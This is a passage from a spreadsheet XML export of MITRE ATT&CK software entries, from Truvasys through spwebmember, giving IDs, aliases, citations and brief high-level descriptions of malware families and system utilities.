    <t>[Truvasys](https://attack.mitre.org/software/S0178) is first-stage malware that has been used by [PROMETHIUM](https://attack.mitre.org/groups/G0056). It is a collection of modules written in the Delphi programming language. (Citation: Microsoft Win Defender Truvasys Sep 2017) (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0178</t>
  </si>
  <si>
    <t>S0116</t>
  </si>
  <si>
    <t>UACMe</t>
  </si>
  <si>
    <t>[UACMe](https://attack.mitre.org/software/S0116) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. (Citation: Github UACMe)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0116</t>
  </si>
  <si>
    <t>S0333</t>
  </si>
  <si>
    <t>UBoatRAT</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) is a remote access tool that was identified in May 2017.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0333</t>
  </si>
  <si>
    <t>S0275</t>
  </si>
  <si>
    <t>UPPERCUT</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045). (Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0275</t>
  </si>
  <si>
    <t>ANEL</t>
  </si>
  <si>
    <t>S0136</t>
  </si>
  <si>
    <t>USBStealer</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) is malware that has used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0136</t>
  </si>
  <si>
    <t>USB Stealer, Win32/USBStealer</t>
  </si>
  <si>
    <t>S0452</t>
  </si>
  <si>
    <t>USBferry</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) is an information stealing malware and has been used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) in targeted attacks against Taiwanese and Philippine air-gapped military environments. [USBferry](https://attack.mitre.org/software/S0452) shares an overlapping codebase with [YAHOYAH](https://attack.mitre.org/software/S0388), though it has several features which makes it a distinct piece of malware.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0452</t>
  </si>
  <si>
    <t>S0221</t>
  </si>
  <si>
    <t>Umbreon</t>
  </si>
  <si>
    <t>A Linux rootkit that provides backdoor access and hides from defenders.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0221</t>
  </si>
  <si>
    <t>S0130</t>
  </si>
  <si>
    <t>Unknown Logger</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. (Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0130</t>
  </si>
  <si>
    <t>S0022</t>
  </si>
  <si>
    <t>Uroburos</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) is a rootkit used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0022</t>
  </si>
  <si>
    <t>S0386</t>
  </si>
  <si>
    <t>Ursnif</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)s, and malicious links.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016) [Ursnif](https://attack.mitre.org/software/S0386) is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0386</t>
  </si>
  <si>
    <t>04 June 2019</t>
  </si>
  <si>
    <t>Dreambot, Gozi-ISFB, PE_URSNIF</t>
  </si>
  <si>
    <t>S0442</t>
  </si>
  <si>
    <t>VBShower</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) is a backdoor that has been used by [Inception](https://attack.mitre.org/groups/G0100) since at least 2019. [VBShower](https://attack.mitre.org/software/S0442) has been used as a downloader for second stage payloads, including [PowerShower](https://attack.mitre.org/software/S0441).(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0442</t>
  </si>
  <si>
    <t>S0257</t>
  </si>
  <si>
    <t>VERMIN</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code. (Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0257</t>
  </si>
  <si>
    <t>S0476</t>
  </si>
  <si>
    <t>Valak</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0476</t>
  </si>
  <si>
    <t>S0207</t>
  </si>
  <si>
    <t>Vasport</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0207</t>
  </si>
  <si>
    <t>S0180</t>
  </si>
  <si>
    <t>Volgmer</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. (Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0180</t>
  </si>
  <si>
    <t>S0109</t>
  </si>
  <si>
    <t>WEBC2</t>
  </si>
  <si>
    <t>[WEBC2](https://attack.mitre.org/software/S0109) is a family of backdoor malware used by [APT1](https://attack.mitre.org/groups/G0006) as early as July 2006. [WEBC2](https://attack.mitre.org/software/S0109) backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0109</t>
  </si>
  <si>
    <t>Wes Hurd</t>
  </si>
  <si>
    <t>S0155</t>
  </si>
  <si>
    <t>WINDSHIELD</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0155</t>
  </si>
  <si>
    <t>S0219</t>
  </si>
  <si>
    <t>WINERACK</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0219</t>
  </si>
  <si>
    <t>S0366</t>
  </si>
  <si>
    <t>WannaCry</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.(Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0366</t>
  </si>
  <si>
    <t>WCry, WanaCry, WanaCrypt, WanaCrypt0r</t>
  </si>
  <si>
    <t>Jan Miller, CrowdStrike</t>
  </si>
  <si>
    <t>S0579</t>
  </si>
  <si>
    <t>Waterbear</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) is modular malware attributed to [BlackTech](https://attack.mitre.org/groups/G0098) that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0579</t>
  </si>
  <si>
    <t>22 February 2021</t>
  </si>
  <si>
    <t>S0515</t>
  </si>
  <si>
    <t>WellMail</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) is a lightweight malware written in Golang used by [APT29](https://attack.mitre.org/groups/G0016), similar in design and structure to [WellMess](https://attack.mitre.org/software/S0514).(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0515</t>
  </si>
  <si>
    <t>S0514</t>
  </si>
  <si>
    <t>WellMess</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) is lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by [APT29](https://attack.mitre.org/groups/G0016).(Citation: CISA WellMess July 2020)(Citation: PWC WellMess July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0514</t>
  </si>
  <si>
    <t>22 March 2021</t>
  </si>
  <si>
    <t>S0206</t>
  </si>
  <si>
    <t>Wiarp</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0206</t>
  </si>
  <si>
    <t>S0059</t>
  </si>
  <si>
    <t>WinMM</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) is a full-featured, simple backdoor used by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0059</t>
  </si>
  <si>
    <t>S0466</t>
  </si>
  <si>
    <t>WindTail</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) is a macOS surveillance implant used by [Windshift](https://attack.mitre.org/groups/G0112). [WindTail](https://attack.mitre.org/software/S0466) shares code similarities with Hack Back aka KitM OSX.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0466</t>
  </si>
  <si>
    <t>04 June 2020</t>
  </si>
  <si>
    <t>S0005</t>
  </si>
  <si>
    <t>Windows Credential Editor</t>
  </si>
  <si>
    <t>[Windows Credential Editor](https://attack.mitre.org/software/S0005) is a password dumping tool. (Citation: Amplia WCE)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0005</t>
  </si>
  <si>
    <t>WCE</t>
  </si>
  <si>
    <t>S0191</t>
  </si>
  <si>
    <t>Winexe</t>
  </si>
  <si>
    <t>[Winexe](https://attack.mitre.org/software/S0191) is a lightweight, open source tool similar to [PsExec](https://attack.mitre.org/software/S0029) designed to allow system administrators to execute commands on remote servers. (Citation: Winexe Github Sept 2013) [Winexe](https://attack.mitre.org/software/S0191) is unique in that it is a GNU/Linux based client. (Citation: Überwachung APT28 Forfiles June 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0191</t>
  </si>
  <si>
    <t>S0176</t>
  </si>
  <si>
    <t>Wingbird</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) is a backdoor that appears to be a version of commercial software [FinFisher](https://attack.mitre.org/software/S0182). It is reportedly used to attack individual computers instead of networks. It was used by [NEODYMIUM](https://attack.mitre.org/groups/G0055) in a May 2016 campaign. (Citation: Microsoft SIR Vol 21) (Citation: Microsoft NEODYMIUM Dec 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0176</t>
  </si>
  <si>
    <t>S0430</t>
  </si>
  <si>
    <t>Winnti for Linux</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including [Winnti Group](https://attack.mitre.org/groups/G0044). The Windows variant is tracked separately under [Winnti for Windows](https://attack.mitre.org/software/S0141).(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0430</t>
  </si>
  <si>
    <t>29 April 2020</t>
  </si>
  <si>
    <t>S0141</t>
  </si>
  <si>
    <t>Winnti for Windows</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) is a Trojan that has been used by multiple groups to carry out intrusions in varied regions from at least 2010 to 2016. One of the groups using this malware is referred to by the same name, [Winnti Group](https://attack.mitre.org/groups/G0044); however, reporting indicates a second distinct group, [Axiom](https://attack.mitre.org/groups/G0001), also uses the malware. (Citation: Kaspersky Winnti April 2013) (Citation: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti April 2015) The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0141</t>
  </si>
  <si>
    <t>04 May 2020</t>
  </si>
  <si>
    <t>S0041</t>
  </si>
  <si>
    <t>Wiper</t>
  </si>
  <si>
    <t>[Wiper](https://attack.mitre.org/software/S0041) is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. (Citation: Dell Wiper)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0041</t>
  </si>
  <si>
    <t>S0161</t>
  </si>
  <si>
    <t>XAgentOSX</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007)  on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0161</t>
  </si>
  <si>
    <t>OSX.Sofacy</t>
  </si>
  <si>
    <t>S0117</t>
  </si>
  <si>
    <t>XTunnel</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by [APT28](https://attack.mitre.org/groups/G0007) during the compromise of the Democratic National Committee. (Citation: Crowdstrike DNC June 2016) (Citation: Invincea XTunnel) (Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0117</t>
  </si>
  <si>
    <t>21 March 2020</t>
  </si>
  <si>
    <t>Trojan.Shunnael, X-Tunnel, XAPS</t>
  </si>
  <si>
    <t>S0341</t>
  </si>
  <si>
    <t>Xbash</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. [Xbash](https://attack.mitre.org/software/S0341) was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0341</t>
  </si>
  <si>
    <t>S0388</t>
  </si>
  <si>
    <t>YAHOYAH</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) is a Trojan used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) as a second-stage backdoor.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0388</t>
  </si>
  <si>
    <t>17 June 2019</t>
  </si>
  <si>
    <t>S0086</t>
  </si>
  <si>
    <t>ZLib</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2014 to 2015. It is malware and should not be confused with the compression library from which its name is derived. (Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0086</t>
  </si>
  <si>
    <t>S0251</t>
  </si>
  <si>
    <t>Zebrocy</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0251</t>
  </si>
  <si>
    <t>Zekapab</t>
  </si>
  <si>
    <t>Emily Ratliff, IBM</t>
  </si>
  <si>
    <t>S0230</t>
  </si>
  <si>
    <t>ZeroT</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) is a Trojan used by [TA459](https://attack.mitre.org/groups/G0062), often in conjunction with [PlugX](https://attack.mitre.org/software/S0013). (Citation: Proofpoint TA459 April 2017) (Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0230</t>
  </si>
  <si>
    <t>S0027</t>
  </si>
  <si>
    <t>Zeroaccess</t>
  </si>
  <si>
    <t>[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that attempts to add victims to the ZeroAccess botnet, often for monetary gain. (Citation: Sophos ZeroAccess)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0027</t>
  </si>
  <si>
    <t>Trojan.Zeroaccess</t>
  </si>
  <si>
    <t>S0330</t>
  </si>
  <si>
    <t>Zeus Panda</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. [Zeus Panda](https://attack.mitre.org/software/S0330)’s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0330</t>
  </si>
  <si>
    <t>S0412</t>
  </si>
  <si>
    <t>ZxShell</t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 )</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0412</t>
  </si>
  <si>
    <t>24 September 2019</t>
  </si>
  <si>
    <t>Sensocode</t>
  </si>
  <si>
    <t>S0202</t>
  </si>
  <si>
    <t>adbupd</t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) is a backdoor used by [PLATINUM](https://attack.mitre.org/groups/G0068) that is similar to [Dipsind](https://attack.mitre.org/software/S0200). (Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0202</t>
  </si>
  <si>
    <t>S0110</t>
  </si>
  <si>
    <t>at</t>
  </si>
  <si>
    <t>[at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time. (Citation: TechNet At)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0110</t>
  </si>
  <si>
    <t>at.exe</t>
  </si>
  <si>
    <t>S0471</t>
  </si>
  <si>
    <t>build_downer</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0471</t>
  </si>
  <si>
    <t>S0160</t>
  </si>
  <si>
    <t>certutil</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. (Citation: TechNet Certutil)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0160</t>
  </si>
  <si>
    <t>31 July 2019</t>
  </si>
  <si>
    <t>certutil.exe</t>
  </si>
  <si>
    <t>S0106</t>
  </si>
  <si>
    <t>cmd</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. (Citation: TechNet Cmd)
Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., &lt;code&gt;dir&lt;/code&gt; (Citation: TechNet Dir)), deleting files (e.g., &lt;code&gt;del&lt;/code&gt; (Citation: TechNet Del)), and copying files (e.g., &lt;code&gt;copy&lt;/code&gt; (Citation: TechNet Copy)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0106</t>
  </si>
  <si>
    <t>cmd.exe</t>
  </si>
  <si>
    <t>S0472</t>
  </si>
  <si>
    <t>down_new</t>
  </si>
  <si>
    <t xml:space="preserve"> [down_new](https://attack.mitre.org/software/S0472) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0472</t>
  </si>
  <si>
    <t>S0105</t>
  </si>
  <si>
    <t>dsquery</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) is a command-line utility that can be used to query Active Directory for information from a system within a domain. (Citation: TechNet Dsquery) It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0105</t>
  </si>
  <si>
    <t>dsquery.exe</t>
  </si>
  <si>
    <t>S0404</t>
  </si>
  <si>
    <t>esentutl</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.(Citation: Microsoft Esentutl)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0404</t>
  </si>
  <si>
    <t>03 September 2019</t>
  </si>
  <si>
    <t>esentutl.exe</t>
  </si>
  <si>
    <t>S0032</t>
  </si>
  <si>
    <t>gh0st RAT</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups. (Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0032</t>
  </si>
  <si>
    <t>2.3</t>
  </si>
  <si>
    <t>S0008</t>
  </si>
  <si>
    <t>gsecdump</t>
  </si>
  <si>
    <t>[gsecdump](https://attack.mitre.org/software/S0008) is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. (Citation: TrueSec Gsecdump)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0008</t>
  </si>
  <si>
    <t>S0071</t>
  </si>
  <si>
    <t>hcdLoader</t>
  </si>
  <si>
    <t>[hcdLoader](https://attack.mitre.org/software/S0071) is a remote access tool (RAT) that has been used by [APT18](https://attack.mitre.org/groups/G0026). (Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0071</t>
  </si>
  <si>
    <t>S0068</t>
  </si>
  <si>
    <t>httpclient</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0068</t>
  </si>
  <si>
    <t>S0278</t>
  </si>
  <si>
    <t>iKitten</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) is a macOS exfiltration agent  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0278</t>
  </si>
  <si>
    <t>OSX/MacDownloader</t>
  </si>
  <si>
    <t>S0101</t>
  </si>
  <si>
    <t>ifconfig</t>
  </si>
  <si>
    <t>[ifconfig](https://attack.mitre.org/software/S0101) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. (Citation: Wikipedia Ifconfig)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0101</t>
  </si>
  <si>
    <t>S0100</t>
  </si>
  <si>
    <t>ipconfig</t>
  </si>
  <si>
    <t>[ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0100</t>
  </si>
  <si>
    <t>ipconfig.exe</t>
  </si>
  <si>
    <t>S0283</t>
  </si>
  <si>
    <t>jRAT</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://attack.mitre.org/software/S0283) have been distributed via a software-as-a-service platform, similar to an online subscription model.(Citation: Kaspersky Adwind Feb 2016) (Citation: jRAT Symantec Aug 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0283</t>
  </si>
  <si>
    <t>Adwind, AlienSpy, Frutas, JSocket, Sockrat, Trojan.Maljava, Unrecom, jBiFrost, jFrutas</t>
  </si>
  <si>
    <t>S0175</t>
  </si>
  <si>
    <t>meek</t>
  </si>
  <si>
    <t>[meek](https://attack.mitre.org/software/S0175) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0175</t>
  </si>
  <si>
    <t>S0102</t>
  </si>
  <si>
    <t>nbtstat</t>
  </si>
  <si>
    <t>[nbtstat](https://attack.mitre.org/software/S0102) is a utility used to troubleshoot NetBIOS name resolution. (Citation: TechNet Nbtstat)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0102</t>
  </si>
  <si>
    <t>nbtstat.exe</t>
  </si>
  <si>
    <t>S0108</t>
  </si>
  <si>
    <t>netsh</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) is a scripting utility used to interact with networking components on local or remote systems. (Citation: TechNet Netsh)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0108</t>
  </si>
  <si>
    <t>netsh.exe</t>
  </si>
  <si>
    <t>S0104</t>
  </si>
  <si>
    <t>netstat</t>
  </si>
  <si>
    <t>[netstat](https://attack.mitre.org/software/S0104) is an operating system utility that displays active TCP connections, listening ports, and network statistics. (Citation: TechNet Netstat)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0104</t>
  </si>
  <si>
    <t>netstat.exe</t>
  </si>
  <si>
    <t>S0385</t>
  </si>
  <si>
    <t>njRAT</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0385</t>
  </si>
  <si>
    <t>Bladabindi, LV, Njw0rm</t>
  </si>
  <si>
    <t>S0067</t>
  </si>
  <si>
    <t>pngdowner</t>
  </si>
  <si>
    <t>[pngdowner](https://attack.mitre.org/software/S0067) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and-
execute" utility. (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0067</t>
  </si>
  <si>
    <t>S0006</t>
  </si>
  <si>
    <t>pwdump</t>
  </si>
  <si>
    <t>[pwdump](https://attack.mitre.org/software/S0006) is a credential dumper. (Citation: Wikipedia pwdump)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0006</t>
  </si>
  <si>
    <t>S0103</t>
  </si>
  <si>
    <t>route</t>
  </si>
  <si>
    <t>[route](https://attack.mitre.org/software/S0103) can be used to find or change information within the local system IP routing table. (Citation: TechNet Route)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0103</t>
  </si>
  <si>
    <t>route.exe</t>
  </si>
  <si>
    <t>S0111</t>
  </si>
  <si>
    <t>schtasks</t>
  </si>
  <si>
    <t>[schtasks](https://attack.mitre.org/software/S0111) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. (Citation: TechNet Schtasks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0111</t>
  </si>
  <si>
    <t>schtasks.exe</t>
  </si>
  <si>
    <t>S0227</t>
  </si>
  <si>
    <t>spwebmember</t>
  </si>
  <si>
    <t>[spwebmember](https://attack.mitre.org/software/S0227) is a Microsoft SharePoint enumeration and data dumping tool written in .NET. (Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0227</t>
  </si>
  <si>
    <t>S0225</t>
